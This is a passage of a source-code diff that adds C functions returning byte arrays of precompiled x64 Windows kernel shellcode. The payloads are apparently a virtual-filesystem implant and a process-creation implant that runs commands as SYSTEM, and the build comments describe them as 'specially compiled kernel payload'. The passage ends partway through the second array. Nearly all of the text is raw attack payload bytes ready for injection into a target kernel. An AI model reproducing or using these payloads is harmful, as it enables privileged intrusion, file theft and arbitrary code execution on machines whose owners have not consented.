+// cl.exe /O1 /Os /Oy /FD /MT /GS- /J /GR- /FAcs /W4 /Zl /c /TC /kernel wx64_common.c
+// cl.exe /O1 /Os /Oy /FD /MT /GS- /J /GR- /FAcs /W4 /Zl /c /TC /kernel wx64_vfs.c
+// ml64 wx64_common_a.asm /Fewx64_vfs.exe /link /NODEFAULTLIB /RELEASE /MACHINE:X64 /entry:main wx64_vfs.obj wx64_common.obj
+// shellcode64.exe -o wx64_vfs.exe
+// xxd -i wx64_vfs.bin
+VOID GetData_VFS(PBYTE *ppb, PDWORD pcb)
+{
+ BYTE WINX64_VFS_BIN[] = {
+ 0x56, 0x48, 0x8b, 0xf4, 0x48, 0x83, 0xe4, 0xf0, 0x48, 0x83, 0xec, 0x20,
+ 0xe8, 0xb7, 0x06, 0x00, 0x00, 0x48, 0x8b, 0xe6, 0x5e, 0xc3, 0x0f, 0x20,
+ 0xd8, 0xc3, 0x0f, 0x09, 0xc3, 0xcc, 0xcc, 0xcc, 0x48, 0x89, 0x5c, 0x24,
+ 0x08, 0x48, 0x89, 0x7c, 0x24, 0x18, 0x55, 0x48, 0x8d, 0x6c, 0x24, 0xa9,
+ 0x48, 0x81, 0xec, 0xb0, 0x00, 0x00, 0x00, 0x48, 0x83, 0x65, 0x6f, 0x00,
+ 0x48, 0x8d, 0x4d, 0x17, 0x48, 0x8b, 0xfa, 0x49, 0x8b, 0xd8, 0xba, 0x10,
+ 0x00, 0x00, 0x00, 0xff, 0x97, 0x80, 0x00, 0x00, 0x00, 0xba, 0x30, 0x00,
+ 0x00, 0x00, 0x48, 0x8d, 0x4d, 0x27, 0xff, 0x97, 0x80, 0x00, 0x00, 0x00,
+ 0x48, 0x8d, 0x93, 0x1c, 0x01, 0x00, 0x00, 0x48, 0x8d, 0x4d, 0x07, 0xff,
+ 0x57, 0x78, 0x83, 0x64, 0x24, 0x50, 0x00, 0x48, 0x8d, 0x45, 0x07, 0x48,
+ 0x83, 0x64, 0x24, 0x48, 0x00, 0x4c, 0x8d, 0x4d, 0x17, 0x48, 0x83, 0x65,
+ 0x2f, 0x00, 0x4c, 0x8d, 0x45, 0x27, 0xc7, 0x44, 0x24, 0x40, 0x20, 0x00,
+ 0x00, 0x00, 0x48, 0x8d, 0x4d, 0x6f, 0x48, 0x89, 0x45, 0x37, 0x0f, 0x57,
+ 0xc0, 0xb8, 0x03, 0x00, 0x00, 0x00, 0x48, 0xc7, 0x45, 0x27, 0x30, 0x00,
+ 0x00, 0x00, 0x89, 0x44, 0x24, 0x38, 0xba, 0x00, 0x00, 0x00, 0x80, 0x89,
+ 0x44, 0x24, 0x30, 0xc7, 0x44, 0x24, 0x28, 0x80, 0x00, 0x00, 0x00, 0x48,
+ 0x83, 0x64, 0x24, 0x20, 0x00, 0x48, 0xc7, 0x45, 0x3f, 0x40, 0x02, 0x00,
+ 0x00, 0xf3, 0x0f, 0x7f, 0x45, 0x47, 0xff, 0x97, 0x90, 0x00, 0x00, 0x00,
+ 0x48, 0x8b, 0x4d, 0x6f, 0x8b, 0xd8, 0x48, 0x85, 0xc9, 0x74, 0x06, 0xff,
+ 0x97, 0x88, 0x00, 0x00, 0x00, 0x4c, 0x8d, 0x9c, 0x24, 0xb0, 0x00, 0x00,
+ 0x00, 0x8b, 0xc3, 0x49, 0x8b, 0x5b, 0x10, 0x49, 0x8b, 0x7b, 0x20, 0x49,
+ 0x8b, 0xe3, 0x5d, 0xc3, 0x48, 0x89, 0x5c, 0x24, 0x08, 0x48, 0x89, 0x7c,
+ 0x24, 0x18, 0x55, 0x48, 0x8d, 0x6c, 0x24, 0xa9, 0x48, 0x81, 0xec, 0xb0,
+ 0x00, 0x00, 0x00, 0x48, 0x83, 0x65, 0x6f, 0x00, 0x48, 0x8d, 0x4d, 0x17,
+ 0x48, 0x8b, 0xfa, 0x49, 0x8b, 0xd8, 0xba, 0x10, 0x00, 0x00, 0x00, 0xff,
+ 0x97, 0x80, 0x00, 0x00, 0x00, 0xba, 0x30, 0x00, 0x00, 0x00, 0x48, 0x8d,
+ 0x4d, 0x27, 0xff, 0x97, 0x80, 0x00, 0x00, 0x00, 0x48, 0x8d, 0x93, 0x1c,
+ 0x01, 0x00, 0x00, 0x48, 0x8d, 0x4d, 0x07, 0xff, 0x57, 0x78, 0x83, 0x64,
+ 0x24, 0x50, 0x00, 0x48, 0x8d, 0x45, 0x07, 0x48, 0x83, 0x64, 0x24, 0x48,
+ 0x00, 0x4c, 0x8d, 0x4d, 0x17, 0x48, 0x83, 0x65, 0x2f, 0x00, 0x4c, 0x8d,
+ 0x45, 0x27, 0xc7, 0x44, 0x24, 0x40, 0x00, 0x10, 0x00, 0x00, 0x48, 0x8d,
+ 0x4d, 0x6f, 0xc7, 0x44, 0x24, 0x38, 0x01, 0x00, 0x00, 0x00, 0x0f, 0x57,
+ 0xc0, 0xc7, 0x44, 0x24, 0x30, 0x04, 0x00, 0x00, 0x00, 0xba, 0x00, 0x00,
+ 0x00, 0x40, 0xc7, 0x44, 0x24, 0x28, 0x80, 0x00, 0x00, 0x00, 0x48, 0x83,
+ 0x64, 0x24, 0x20, 0x00, 0x48, 0xc7, 0x45, 0x27, 0x30, 0x00, 0x00, 0x00,
+ 0x48, 0xc7, 0x45, 0x3f, 0x40, 0x02, 0x00, 0x00, 0x48, 0x89, 0x45, 0x37,
+ 0xf3, 0x0f, 0x7f, 0x45, 0x47, 0xff, 0x97, 0x90, 0x00, 0x00, 0x00, 0x48,
+ 0x8b, 0x4d, 0x6f, 0x8b, 0xd8, 0x48, 0x85, 0xc9, 0x74, 0x06, 0xff, 0x97,
+ 0x88, 0x00, 0x00, 0x00, 0x4c, 0x8d, 0x9c, 0x24, 0xb0, 0x00, 0x00, 0x00,
+ 0x8b, 0xc3, 0x49, 0x8b, 0x5b, 0x10, 0x49, 0x8b, 0x7b, 0x20, 0x49, 0x8b,
+ 0xe3, 0x5d, 0xc3, 0xcc, 0x48, 0x8b, 0xc4, 0x48, 0x89, 0x58, 0x10, 0x48,
+ 0x89, 0x70, 0x18, 0x48, 0x89, 0x78, 0x20, 0x55, 0x41, 0x54, 0x41, 0x55,
+ 0x41, 0x56, 0x41, 0x57, 0x48, 0x8d, 0x68, 0xa1, 0x48, 0x81, 0xec, 0xb0,
+ 0x00, 0x00, 0x00, 0x33, 0xc0, 0x48, 0x8b, 0xd9, 0x48, 0x8b, 0x89, 0x10,
+ 0x02, 0x00, 0x00, 0x49, 0x8b, 0xf8, 0x48, 0x89, 0x45, 0x67, 0x4c, 0x8b,
+ 0xfa, 0x44, 0x8b, 0xf0, 0x48, 0x81, 0xf9, 0x00, 0x00, 0x20, 0x00, 0x73,
+ 0x0a, 0xb8, 0x07, 0x00, 0x00, 0xf0, 0xe9, 0xd5, 0x01, 0x00, 0x00, 0x4c,
+ 0x8b, 0x63, 0x28, 0x48, 0x81, 0xc1, 0x00, 0x00, 0xf0, 0xff, 0x4c, 0x03,
+ 0xa3, 0x08, 0x02, 0x00, 0x00, 0x48, 0xb8, 0x8f, 0xe3, 0x38, 0x8e, 0xe3,
+ 0x38, 0x8e, 0xe3, 0x48, 0xf7, 0xe1, 0x48, 0x8d, 0x4d, 0xe7, 0x4c, 0x8b,
+ 0xea, 0xba, 0x10, 0x00, 0x00, 0x00, 0x49, 0xc1, 0xed, 0x09, 0x41, 0xff,
+ 0x97, 0x80, 0x00, 0x00, 0x00, 0xbe, 0x30, 0x00, 0x00, 0x00, 0x48, 0x8d,
+ 0x4d, 0x07, 0x8b, 0xd6, 0x41, 0xff, 0x97, 0x80, 0x00, 0x00, 0x00, 0x48,
+ 0x8d, 0x97, 0x1c, 0x01, 0x00, 0x00, 0x48, 0x8d, 0x4d, 0xf7, 0x41, 0xff,
+ 0x57, 0x78, 0x4c, 0x21, 0x75, 0x0f, 0x48, 0x8d, 0x45, 0xf7, 0x0f, 0x57,
+ 0xc0, 0xc7, 0x44, 0x24, 0x28, 0x21, 0x40, 0x00, 0x00, 0x4c, 0x8d, 0x4d,
+ 0xe7, 0x48, 0x89, 0x45, 0x17, 0x4c, 0x8d, 0x45, 0x07, 0x48, 0x89, 0x75,
+ 0x07, 0xba, 0x01, 0x00, 0x10, 0x00, 0x48, 0xc7, 0x45, 0x1f, 0x40, 0x02,
+ 0x00, 0x00, 0x48, 0x8d, 0x4d, 0x67, 0xc7, 0x44, 0x24, 0x20, 0x03, 0x00,
+ 0x00, 0x00, 0xf3, 0x0f, 0x7f, 0x45, 0x27, 0x41, 0xff, 0x97, 0x98, 0x00,
+ 0x00, 0x00, 0x33, 0xd2, 0x8b, 0xf8, 0x85, 0xc0, 0x0f, 0x85, 0x01, 0x01,
+ 0x00, 0x00, 0xc6, 0x44, 0x24, 0x50, 0x01, 0xe9, 0x96, 0x00, 0x00, 0x00,
+ 0x48, 0x39, 0x55, 0xef, 0x0f, 0x84, 0xed, 0x00, 0x00, 0x00, 0xba, 0x40,
+ 0x02, 0x00, 0x00, 0x49, 0x8b, 0xcc, 0x41, 0xff, 0x97, 0x80, 0x00, 0x00,
+ 0x00, 0x48, 0x8b, 0x46, 0x28, 0x48, 0x8d, 0x56, 0x5e, 0x49, 0x89, 0x44,
+ 0x24, 0x30, 0x48, 0x8b, 0x46, 0x10, 0x49, 0x89, 0x44, 0x24, 0x08, 0x48,
+ 0x8b, 0x46, 0x08, 0x49, 0x89, 0x44, 0x24, 0x18, 0x48, 0x8b, 0x46, 0x20,
+ 0x49, 0x83, 0x0c, 0x24, 0x10, 0x49, 0x89, 0x44, 0x24, 0x10, 0x8b, 0x46,
+ 0x38, 0x24, 0x10, 0xf6, 0xd8, 0x48, 0x1b, 0xc9, 0x48, 0xf7, 0xd9, 0x48,
+ 0xff, 0xc1, 0x49, 0x09, 0x0c, 0x24, 0xb9, 0x03, 0x01, 0x00, 0x00, 0x8b,
+ 0x46, 0x3c, 0x3b, 0xc1, 0x0f, 0x47, 0xc1, 0x49, 0x8d, 0x4c, 0x24, 0x38,
+ 0x44, 0x8b, 0xc0, 0x41, 0xff, 0x57, 0x60, 0x33, 0xd2, 0x49, 0x81, 0xc4,
+ 0x40, 0x02, 0x00, 0x00, 0x49, 0xff, 0xc6, 0x4d, 0x3b, 0xf5, 0x73, 0x73,
+ 0x8b, 0x06, 0x85, 0xc0, 0x74, 0x08, 0x48, 0x03, 0xf0, 0xe9, 0x78, 0xff,
+ 0xff, 0xff, 0x88, 0x54, 0x24, 0x50, 0x48, 0x8b, 0x4b, 0x28, 0x48, 0x8d,
+ 0x45, 0xe7, 0x48, 0x03, 0x8b, 0x10, 0x02, 0x00, 0x00, 0x45, 0x33, 0xc9,
+ 0x48, 0x8b, 0xb3, 0x08, 0x02, 0x00, 0x00, 0x45, 0x33, 0xc0, 0x48, 0x89,
+ 0x54, 0x24, 0x48, 0x48, 0x81, 0xc6, 0x00, 0x00, 0xf0, 0xff, 0x88, 0x54,
+ 0x24, 0x40, 0x48, 0x03, 0xf1, 0x48, 0x8b, 0x4d, 0x67, 0x48, 0xc7, 0x44,
+ 0x24, 0x38, 0x03, 0x00, 0x00, 0x00, 0xc7, 0x44, 0x24, 0x30, 0x00, 0x00,
+ 0x10, 0x00, 0x48, 0x89, 0x74, 0x24, 0x28, 0x48, 0x89, 0x44, 0x24, 0x20,
+ 0x41, 0xff, 0x97, 0xa0, 0x00, 0x00, 0x00, 0x33, 0xd2, 0x8b, 0xf8, 0x85,
+ 0xc0, 0x0f, 0x84, 0x09, 0xff, 0xff, 0xff, 0x48, 0x8b, 0x4d, 0x67, 0x4b,
+ 0x8d, 0x04, 0xf6, 0x48, 0xc1, 0xe0, 0x06, 0x48, 0x89, 0x83, 0x00, 0x02,
+ 0x00, 0x00, 0x48, 0x85, 0xc9, 0x74, 0x09, 0x41, 0xff, 0x97, 0x88, 0x00,
+ 0x00, 0x00, 0x33, 0xd2, 0x4d, 0x85, 0xf6, 0x0f, 0x45, 0xfa, 0x8b, 0xc7,
+ 0x4c, 0x8d, 0x9c, 0x24, 0xb0, 0x00, 0x00, 0x00, 0x49, 0x8b, 0x5b, 0x38,
+ 0x49, 0x8b, 0x73, 0x40, 0x49, 0x8b, 0x7b, 0x48, 0x49, 0x8b, 0xe3, 0x41,
+ 0x5f, 0x41, 0x5e, 0x41, 0x5d, 0x41, 0x5c, 0x5d, 0xc3, 0xcc, 0xcc, 0xcc,
+ 0x48, 0x89, 0x5c, 0x24, 0x08, 0x48, 0x89, 0x74, 0x24, 0x18, 0x55, 0x57,
+ 0x41, 0x56, 0x48, 0x8d, 0x6c, 0x24, 0xb9, 0x48, 0x81, 0xec, 0xb0, 0x00,
+ 0x00, 0x00, 0x48, 0x83, 0x65, 0x6f, 0x00, 0x48, 0x8b, 0xfa, 0x48, 0x8b,
+ 0xf1, 0xbb, 0x30, 0x00, 0x00, 0x00, 0x8b, 0xd3, 0x48, 0x8d, 0x4d, 0x17,
+ 0x4d, 0x8b, 0xf0, 0xff, 0x97, 0x80, 0x00, 0x00, 0x00, 0x8d, 0x53, 0xe0,
+ 0x48, 0x8d, 0x4d, 0xf7, 0xff, 0x97, 0x80, 0x00, 0x00, 0x00, 0x49, 0x8d,
+ 0x96, 0x1c, 0x01, 0x00, 0x00, 0x48, 0x8d, 0x4d, 0x07, 0xff, 0x57, 0x78,
+ 0x83, 0x64, 0x24, 0x50, 0x00, 0x48, 0x8d, 0x45, 0x07, 0x48, 0x83, 0x64,
+ 0x24, 0x48, 0x00, 0x4c, 0x8d, 0x4d, 0xf7, 0x48, 0x83, 0x65, 0x1f, 0x00,
+ 0x4c, 0x8d, 0x45, 0x17, 0xc7, 0x44, 0x24, 0x40, 0x20, 0x00, 0x00, 0x00,
+ 0x48, 0x8d, 0x4d, 0x6f, 0xc7, 0x44, 0x24, 0x38, 0x01, 0x00, 0x00, 0x00,
+ 0x0f, 0x57, 0xc0, 0xc7, 0x44, 0x24, 0x30, 0x03, 0x00, 0x00, 0x00, 0xba,
+ 0x00, 0x00, 0x00, 0x80, 0xc7, 0x44, 0x24, 0x28, 0x80, 0x00, 0x00, 0x00,
+ 0x48, 0x83, 0x64, 0x24, 0x20, 0x00, 0x48, 0x89, 0x5d, 0x17, 0x48, 0xc7,
+ 0x45, 0x2f, 0x40, 0x02, 0x00, 0x00, 0x48, 0x89, 0x45, 0x27, 0xf3, 0x0f,
+ 0x7f, 0x45, 0x37, 0xff, 0x97, 0x90, 0x00, 0x00, 0x00, 0x8b, 0xd8, 0x85,
+ 0xc0, 0x75, 0x59, 0x48, 0x83, 0x64, 0x24, 0x40, 0x00, 0x49, 0x8d, 0x86,
+ 0x28, 0x03, 0x00, 0x00, 0x48, 0x8b, 0x8e, 0x08, 0x02, 0x00, 0x00, 0x45,
+ 0x33, 0xc9, 0x48, 0x03, 0x4e, 0x28, 0x45, 0x33, 0xc0, 0x48, 0x89, 0x44,
+ 0x24, 0x38, 0x33, 0xd2, 0x41, 0x8b, 0x86, 0x30, 0x03, 0x00, 0x00, 0x89,
+ 0x44, 0x24, 0x30, 0x48, 0x8d, 0x45, 0xf7, 0x48, 0x89, 0x4c, 0x24, 0x28,
+ 0x48, 0x8b, 0x4d, 0x6f, 0x48, 0x89, 0x44, 0x24, 0x20, 0xff, 0x97, 0xb8,
+ 0x00, 0x00, 0x00, 0x8b, 0xd8, 0x85, 0xc0, 0x75, 0x0b, 0x48, 0x8b, 0x45,
+ 0xff, 0x48, 0x89, 0x86, 0x00, 0x02, 0x00, 0x00, 0x48, 0x8b, 0x4d, 0x6f,
+ 0x48, 0x85, 0xc9, 0x74, 0x06, 0xff, 0x97, 0x88, 0x00, 0x00, 0x00, 0x4c,
+ 0x8d, 0x9c, 0x24, 0xb0, 0x00, 0x00, 0x00, 0x8b, 0xc3, 0x49, 0x8b, 0x5b,
+ 0x20, 0x49, 0x8b, 0x73, 0x30, 0x49, 0x8b, 0xe3, 0x41, 0x5e, 0x5f, 0x5d,
+ 0xc3, 0xcc, 0xcc, 0xcc, 0x48, 0x8b, 0xc4, 0x48, 0x89, 0x58, 0x08, 0x48,
+ 0x89, 0x70, 0x18, 0x48, 0x89, 0x78, 0x20, 0x55, 0x48, 0x8d, 0x68, 0xa1,
+ 0x48, 0x81, 0xec, 0xb0, 0x00, 0x00, 0x00, 0x48, 0x83, 0x65, 0x6f, 0x00,
+ 0x48, 0x8d, 0x4d, 0x27, 0x48, 0x8b, 0xf2, 0xbf, 0x30, 0x00, 0x00, 0x00,
+ 0x8b, 0xd7, 0x49, 0x8b, 0xd8, 0xff, 0x96, 0x80, 0x00, 0x00, 0x00, 0x8d,
+ 0x57, 0xe0, 0x48, 0x8d, 0x4d, 0x07, 0xff, 0x96, 0x80, 0x00, 0x00, 0x00,
+ 0x48, 0x8d, 0x93, 0x1c, 0x01, 0x00, 0x00, 0x48, 0x8d, 0x4d, 0x17, 0xff,
+ 0x56, 0x78, 0x48, 0x8b, 0x4b, 0x10, 0x48, 0x8d, 0x45, 0x17, 0x48, 0x83,
+ 0x65, 0x2f, 0x00, 0x0f, 0x57, 0xc0, 0x48, 0x89, 0x45, 0x37, 0x8a, 0xc1,
+ 0x24, 0x80, 0x48, 0x89, 0x7d, 0x27, 0xf6, 0xd8, 0x48, 0xc7, 0x45, 0x3f,
+ 0x40, 0x02, 0x00, 0x00, 0xf3, 0x0f, 0x7f, 0x45, 0x47, 0x1b, 0xd2, 0x81,
+ 0xe2, 0x04, 0x00, 0x00, 0xc0, 0x81, 0xc2, 0x00, 0x00, 0x00, 0x40, 0xf6,
+ 0xc1, 0x40, 0x74, 0x0d, 0x48, 0x83, 0xbb, 0x28, 0x03, 0x00, 0x00, 0x00,
+ 0x8d, 0x47, 0xd5, 0x74, 0x05, 0xb8, 0x01, 0x00, 0x00, 0x00, 0x83, 0x64,
+ 0x24, 0x50, 0x00, 0x4c, 0x8d, 0x4d, 0x07, 0x48, 0x83, 0x64, 0x24, 0x48,
+ 0x00, 0x4c, 0x8d, 0x45, 0x27, 0xc7, 0x44, 0x24, 0x40, 0x20, 0x00, 0x00,
+ 0x00, 0x48, 0x8d, 0x4d, 0x6f, 0x89, 0x44, 0x24, 0x38, 0x83, 0x64, 0x24,
+ 0x30, 0x00, 0xc7, 0x44, 0x24, 0x28, 0x80, 0x00, 0x00, 0x00, 0x48, 0x83,
+ 0x64, 0x24, 0x20, 0x00, 0xff, 0x96, 0x90, 0x00, 0x00, 0x00, 0x8b, 0xf8,
+ 0x85, 0xc0, 0x75, 0x45, 0x48, 0x83, 0x64, 0x24, 0x40, 0x00, 0x48, 0x8d,
+ 0x83, 0x28, 0x03, 0x00, 0x00, 0x48, 0x89, 0x44, 0x24, 0x38, 0x48, 0x8d,
+ 0x8b, 0x38, 0x03, 0x00, 0x00, 0x8b, 0x83, 0x30, 0x03, 0x00, 0x00, 0x45,
+ 0x33, 0xc9, 0x89, 0x44, 0x24, 0x30, 0x45, 0x33, 0xc0, 0x48, 0x89, 0x4c,
+ 0x24, 0x28, 0x48, 0x8d, 0x45, 0x07, 0x48, 0x8b, 0x4d, 0x6f, 0x33, 0xd2,
+ 0x48, 0x89, 0x44, 0x24, 0x20, 0xff, 0x96, 0xc0, 0x00, 0x00, 0x00, 0x8b,
+ 0xf8, 0x48, 0x8b, 0x4d, 0x6f, 0x48, 0x85, 0xc9, 0x74, 0x06, 0xff, 0x96,
+ 0x88, 0x00, 0x00, 0x00, 0x4c, 0x8d, 0x9c, 0x24, 0xb0, 0x00, 0x00, 0x00,
+ 0x8b, 0xc7, 0x49, 0x8b, 0x5b, 0x10, 0x49, 0x8b, 0x73, 0x20, 0x49, 0x8b,
+ 0x7b, 0x28, 0x49, 0x8b, 0xe3, 0x5d, 0xc3, 0xcc, 0x40, 0x53, 0x48, 0x81,
+ 0xec, 0xf0, 0x00, 0x00, 0x00, 0x48, 0x8b, 0xd9, 0x48, 0x8d, 0x54, 0x24,
+ 0x20, 0x48, 0x8b, 0x49, 0x08, 0xe8, 0xba, 0x00, 0x00, 0x00, 0x4c, 0x8b,
+ 0x83, 0x08, 0x01, 0x00, 0x00, 0x4c, 0x03, 0x43, 0x28, 0x48, 0x81, 0xbb,
+ 0x00, 0x01, 0x00, 0x00, 0x38, 0x03, 0x00, 0x00, 0x0f, 0x82, 0x86, 0x00,
+ 0x00, 0x00, 0x48, 0xb8, 0x0f, 0x13, 0xaa, 0x93, 0xad, 0x20, 0xe7, 0x79,
+ 0x49, 0x39, 0x00, 0x75, 0x77, 0x49, 0x8b, 0x40, 0x08, 0x48, 0x83, 0xf8,
+ 0x01, 0x75, 0x19, 0x48, 0x8d, 0x54, 0x24, 0x20, 0x48, 0x8b, 0xcb, 0xe8,
+ 0xc0, 0xfa, 0xff, 0xff, 0x48, 0x63, 0xc8, 0x48, 0x89, 0x8b, 0x20, 0x02,
+ 0x00, 0x00, 0xeb, 0x60, 0x48, 0x83, 0xf8, 0x03, 0x75, 0x0f, 0x48, 0x8d,
+ 0x54, 0x24, 0x20, 0x48, 0x8b, 0xcb, 0xe8, 0xe9, 0xfc, 0xff, 0xff, 0xeb,
+ 0xdf, 0x48, 0x83, 0xf8, 0x02, 0x75, 0x0f, 0x48, 0x8d, 0x54, 0x24, 0x20,
+ 0x48, 0x8b, 0xcb, 0xe8, 0x1c, 0xfe, 0xff, 0xff, 0xeb, 0xca, 0x48, 0x83,
+ 0xf8, 0x04, 0x75, 0x0f, 0x48, 0x8d, 0x54, 0x24, 0x20, 0x48, 0x8b, 0xcb,
+ 0xe8, 0xb3, 0xf8, 0xff, 0xff, 0xeb, 0xb5, 0x48, 0x83, 0xf8, 0x05, 0x75,
+ 0x1b, 0x48, 0x8d, 0x54, 0x24, 0x20, 0x48, 0x8b, 0xcb, 0xe8, 0x7e, 0xf9,
+ 0xff, 0xff, 0xeb, 0xa0, 0xb8, 0x01, 0x00, 0x00, 0xc0, 0x48, 0x89, 0x83,
+ 0x20, 0x02, 0x00, 0x00, 0x48, 0x81, 0xc4, 0xf0, 0x00, 0x00, 0x00, 0x5b,
+ 0xc3, 0xcc, 0xcc, 0xcc, 0x48, 0x8b, 0xc4, 0x48, 0x89, 0x58, 0x08, 0x48,
+ 0x89, 0x70, 0x10, 0x48, 0x89, 0x78, 0x18, 0x4c, 0x89, 0x70, 0x20, 0x55,
+ 0x48, 0x8d, 0x68, 0xa1, 0x48, 0x81, 0xec, 0x90, 0x00, 0x00, 0x00, 0x4c,
+ 0x8b, 0xf1, 0xc7, 0x45, 0xe7, 0x4a, 0x45, 0x3b, 0xd7, 0xc7, 0x45, 0xeb,
+ 0x62, 0xe0, 0x07, 0x37, 0x48, 0x8d, 0xba, 0xc8, 0x00, 0x00, 0x00, 0xc7,
+ 0x45, 0xef, 0x1f, 0x9d, 0x48, 0x9d, 0x48, 0x8d, 0x75, 0x4b, 0xc7, 0x45,
+ 0xf3, 0xa1, 0x7b, 0xcc, 0xdc, 0xbb, 0x19, 0x00, 0x00, 0x00, 0xc7, 0x45,
+ 0xf7, 0x92, 0x6d, 0x58, 0x58, 0xc7, 0x45, 0xfb, 0xce, 0xad, 0x90, 0x4d,
+ 0xc7, 0x45, 0xff, 0x57, 0x63, 0x32, 0x5a, 0xc7, 0x45, 0x03, 0x8f, 0xb5,
+ 0x6a, 0x6a, 0xc7, 0x45, 0x07, 0xf9, 0xbe, 0xdd, 0x05, 0xc7, 0x45, 0x0b,
+ 0xf7, 0x38, 0xb3, 0x9d, 0xc7, 0x45, 0x0f, 0xc9, 0xc5, 0x6e, 0x6c, 0xc7,
+ 0x45, 0x13, 0x89, 0x83, 0x6c, 0xeb, 0xc7, 0x45, 0x17, 0x9b, 0x97, 0x64,
+ 0xcf, 0xc7, 0x45, 0x1b, 0x2a, 0xc0, 0xb2, 0xa8, 0xc7, 0x45, 0x1f, 0x3d,
+ 0x28, 0xc3, 0x7c, 0xc7, 0x45, 0x23, 0x2a, 0xd0, 0x35, 0x30, 0xc7, 0x45,
+ 0x27, 0xdb, 0x4f, 0x3d, 0xc5, 0xc7, 0x45, 0x2b, 0x61, 0x4c, 0x04, 0x5d,
+ 0xc7, 0x45, 0x2f, 0x9d, 0x8f, 0xa0, 0xc3, 0xc7, 0x45, 0x33, 0xb8, 0xd4,
+ 0x29, 0x88, 0xc7, 0x45, 0x37, 0x50, 0x64, 0xb0, 0x6f, 0xc7, 0x45, 0x3b,
+ 0xe2, 0xca, 0x61, 0xe6, 0xc7, 0x45, 0x3f, 0xde, 0x24, 0xe6, 0xf7, 0xc7,
+ 0x45, 0x43, 0x16, 0x35, 0xfd, 0x87, 0xc7, 0x45, 0x47, 0x36, 0x31, 0x0e,
+ 0x68, 0x48, 0x8d, 0x76, 0xfc, 0x49, 0x8b, 0xce, 0x8b, 0x16, 0x48, 0x8d,
+ 0x7f, 0xf8, 0xe8, 0x25, 0x00, 0x00, 0x00, 0x48, 0x89, 0x07, 0x83, 0xc3,
+ 0xff, 0x75, 0xe6, 0x4c, 0x8d, 0x9c, 0x24, 0x90, 0x00, 0x00, 0x00, 0x49,
+ 0x8b, 0x5b, 0x10, 0x49, 0x8b, 0x73, 0x18, 0x49, 0x8b, 0x7b, 0x20, 0x4d,
+ 0x8b, 0x73, 0x28, 0x49, 0x8b, 0xe3, 0x5d, 0xc3, 0x48, 0x8b, 0xc4, 0x48,
+ 0x89, 0x58, 0x08, 0x48, 0x89, 0x68, 0x10, 0x48, 0x89, 0x70, 0x18, 0x48,
+ 0x89, 0x78, 0x20, 0x8b, 0xea, 0x48, 0x85, 0xc9, 0x74, 0x7a, 0xb8, 0x4d,
+ 0x5a, 0x00, 0x00, 0x66, 0x39, 0x01, 0x75, 0x70, 0x48, 0x63, 0x41, 0x3c,
+ 0x48, 0x03, 0xc1, 0x74, 0x67, 0x81, 0x38, 0x50, 0x45, 0x00, 0x00, 0x75,
+ 0x5f, 0x8b, 0x90, 0x88, 0x00, 0x00, 0x00, 0x48, 0x03, 0xd1, 0x74, 0x54,
+ 0x44, 0x8b, 0x5a, 0x18, 0x45, 0x85, 0xdb, 0x74, 0x4b, 0x8b, 0x42, 0x20,
+ 0x85, 0xc0, 0x74, 0x44, 0x8b, 0x72, 0x24, 0x4c, 0x8d, 0x0c, 0x01, 0x8b,
+ 0x7a, 0x1c, 0x48, 0x03, 0xf1, 0x48, 0x03, 0xf9, 0x45, 0x33, 0xc0, 0x45,
+ 0x85, 0xdb, 0x74, 0x2c, 0x45, 0x8b, 0x11, 0x4c, 0x03, 0xd1, 0x33, 0xdb,
+ 0xeb, 0x0b, 0x0f, 0xb6, 0xc0, 0x49, 0xff, 0xc2, 0xc1, 0xcb, 0x0d, 0x03,
+ 0xd8, 0x41, 0x8a, 0x02, 0x84, 0xc0, 0x75, 0xee, 0x3b, 0xdd, 0x74, 0x23,
+ 0x41, 0xff, 0xc0, 0x49, 0x83, 0xc1, 0x04, 0x45, 0x3b, 0xc3, 0x72, 0xd4,
+ 0x33, 0xc0, 0x48, 0x8b, 0x5c, 0x24, 0x08, 0x48, 0x8b, 0x6c, 0x24, 0x10,
+ 0x48, 0x8b, 0x74, 0x24, 0x18, 0x48, 0x8b, 0x7c, 0x24, 0x20, 0xc3, 0x46,
+ 0x0f, 0xb7, 0x04, 0x46, 0x44, 0x3b, 0x42, 0x14, 0x73, 0xde, 0x42, 0x8b,
+ 0x04, 0x87, 0x48, 0x03, 0xc1, 0xeb, 0xd7
+ };
+ *ppb = WINX64_VFS_BIN;
+ *pcb = sizeof(WINX64_VFS_BIN);
+}
+
+// specially compiled kernel payload, compile and extract shellcode with:
+//
+// cl.exe /O1 /Os /Oy /FD /MT /GS- /J /GR- /FAcs /W4 /Zl /c /TC /kernel wx64_common.c
+// cl.exe /O1 /Os /Oy /FD /MT /GS- /J /GR- /FAcs /W4 /Zl /c /TC /kernel /D_PSCMD /D_PSCMD_SYSTEM /D_EXEC_USER_EXTERNAL wx64_pscreate.c
+// ml64 wx64_common_a.asm /Fewx64_pscmd.exe /link /NODEFAULTLIB /RELEASE /MACHINE:X64 /entry:main wx64_pscreate.obj wx64_common.obj
+// shellcode64.exe -o wx64_pscmd.exe
+// xxd -i wx64_pscmd.bin
+VOID GetData_PSCMD_KERNEL(PBYTE *ppb, PDWORD pcb)
+{
+ BYTE WINX64_PSCMD_KERNEL_BIN[] = {
+ 0x56, 0x48, 0x8b, 0xf4, 0x48, 0x83, 0xe4, 0xf0, 0x48, 0x83, 0xec, 0x20,
+ 0xe8, 0x7b, 0x06, 0x00, 0x00, 0x48, 0x8b, 0xe6, 0x5e, 0xc3, 0x0f, 0x20,
+ 0xd8, 0xc3, 0x0f, 0x09, 0xc3, 0xcc, 0xcc, 0xcc, 0x40, 0x55, 0x53, 0x56,
+ 0x57, 0x41, 0x55, 0x41, 0x56, 0x41, 0x57, 0x48, 0x8d, 0x6c, 0x24, 0xd9,
+ 0x48, 0x81, 0xec, 0xe0, 0x00, 0x00, 0x00, 0x4c, 0x8b, 0xb9, 0x20, 0x01,
+ 0x00, 0x00, 0x48, 0x8b, 0xf2, 0x48, 0x83, 0x65, 0x7f, 0x00, 0x48, 0x8d,
+ 0x55, 0x7f, 0x48, 0x83, 0x65, 0x77, 0x00, 0x48, 0x8b, 0xd9, 0x45, 0x33,
+ 0xf6, 0x48, 0xc7, 0x45, 0x97, 0x00, 0x10, 0x00, 0x00, 0x4c, 0x21, 0x75,
+ 0x67, 0x49, 0x8b, 0xcf, 0x49, 0x8b, 0xf8, 0x41, 0xff, 0x50, 0x58, 0x48,
+ 0x63, 0xc8, 0x41, 0xbd, 0x00, 0x00, 0x00, 0xc0, 0x8b, 0xc1, 0x41, 0x23,
